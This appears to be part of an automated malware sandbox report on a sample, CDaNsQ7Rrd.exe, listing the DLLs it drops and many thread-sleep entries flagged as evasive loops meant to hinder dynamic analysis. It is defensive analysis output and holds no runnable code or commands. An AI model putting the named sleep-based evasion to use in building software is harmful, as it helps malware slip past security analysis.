Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe	Dropped PE file which has not been started: C:\Users\HERBBL~1\AppData\Local\Temp\AI_EXTUI_BIN_2404\aicustact.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Adobe\Adobe Reader\prerequisites\RequiredApplication\setup.exe	Dropped PE file which has not been started: C:\inst_fold\7za.dll	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\msiexec.exe TID: 3368	Thread sleep count: 942 > 30
Source: C:\Windows\System32\msiexec.exe TID: 3368	Thread sleep time: -56520000s >= -60000s
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe TID: 3584	Thread sleep time: -120000s >= -60000s
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe TID: 2304	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\msiexec.exe TID: 2192	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\msiexec.exe TID: 2392	Thread sleep time: -60000s >= -60000s
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe TID: 1396	Thread sleep time: -300000s >= -60000s
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe TID: 2796	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\msiexec.exe TID: 2468	Thread sleep count: 142 > 30
Source: C:\Windows\System32\msiexec.exe TID: 2468	Thread sleep time: -8520000s >= -60000s
Source: C:\Users\user\Desktop\CDaNsQ7Rrd.exe TID: 2412	Thread sleep time: -180000s >= -60000s
Source: C:\Windows\System32\msiexec.exe TID: 2692	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\msiexec.exe TID: 2260	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 2556	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 2140	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 2300	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 1312	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 2204	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 2600	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3084	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3084	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2432	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2432	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1916	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2040	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1148	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1148	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3296	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1332	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3388	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3344	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 524	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 524	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1504	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1504	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 3464	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 3736	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3540	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3664	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1172	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1172	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 196	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 196	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3764	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3764	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 532	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 532	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1596	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1596	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3128	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3128	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 872	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 872	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3264	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3264	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3244	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3244	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3900	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3900	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3852	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3852	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 812	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 4004	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 3712	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 2292	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 4076	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2464	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 4016	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\explorer.exe TID: 2172	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\explorer.exe TID: 1832	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2412	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2412	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\dllhost.exe TID: 2484	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1312	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\cscript.exe TID: 480	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2540	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2540	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2716	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2716	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2744	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2744	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2352	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2352	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1060	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1060	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1372	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1372	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2812	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2812	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2864	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2864	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2788	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2788	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 3284	Thread sleep time: -180000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 732	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2884	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2884	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2960	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2960	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2336	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2040	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2040	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3148	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3316	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3316	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3408	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3408	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3104	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3104	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3664	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3664	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1380	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1380	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3772	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3772	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3668	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3668	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 3840	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 3812	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 748	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 748	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1644	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1644	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3132	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3132	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 804	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 804	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3136	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3136	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3116	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3116	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3272	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3272	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3852	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3852	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2968	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2968	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 188	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 188	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2216	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2216	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 2116	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 2392	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 4016	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 4016	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3468	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3468	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3560	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3560	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2412	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2412	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1192	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1192	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2140	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2140	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 4008	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 4008	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3252	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3252	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2080	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2080	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2052	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2052	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 728	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 728	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2752	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2752	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2748	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2748	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2812	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2812	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 2872	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 2300	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2288	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2288	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2404	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2404	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2784	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2784	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2584	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2584	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3284	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3284	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2444	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2444	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2640	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2640	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2884	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2884	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3068	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3068	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2592	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2592	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1328	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1328	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2088	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2088	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3356	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3356	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1752	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1752	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2588	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2588	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 3328	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 3384	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3316	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3316	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3288	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3288	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3424	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3424	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3220	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3220	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3548	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3548	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3508	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3508	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3428	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3428	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3248	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3248	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1304	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1304	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 612	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 612	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3772	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3772	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3668	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3668	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 3776	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 3244	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1168	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1168	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3132	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3132	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3848	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3848	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 804	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 804	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3108	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3108	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2804	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2804	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3888	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3888	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3936	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3936	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3164	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3164	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1876	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1876	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3112	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3112	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 4016	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 4016	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3468	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3468	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 4088	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 4088	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1708	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1708	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 2500	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 248	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 448	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 448	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1312	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1312	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 480	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 480	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2540	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2540	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3452	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3452	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 228	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 228	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2548	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2548	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2688	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1372	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1108	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1108	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2292	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2292	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2016	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2016	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 2188	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 3740	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2468	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2468	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2184	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2184	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2164	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2164	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2308	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2308	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2936	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2936	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2904	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2904	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3084	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3084	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2592	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2592	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1328	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1328	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2040	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 2040	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1148	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1148	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3440	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3440	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1872	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 1872	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 3336	Thread sleep time: -120000s >= -60000s
Source: C:\Windows\System32\tasklist.exe TID: 3368	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3276	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3276	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3292	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3292	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3512	Thread sleep time: -60000s >= -60000s
Source: C:\Windows\System32\taskkill.exe TID: 3512	Thread sleep time: -60000s >= -60000s
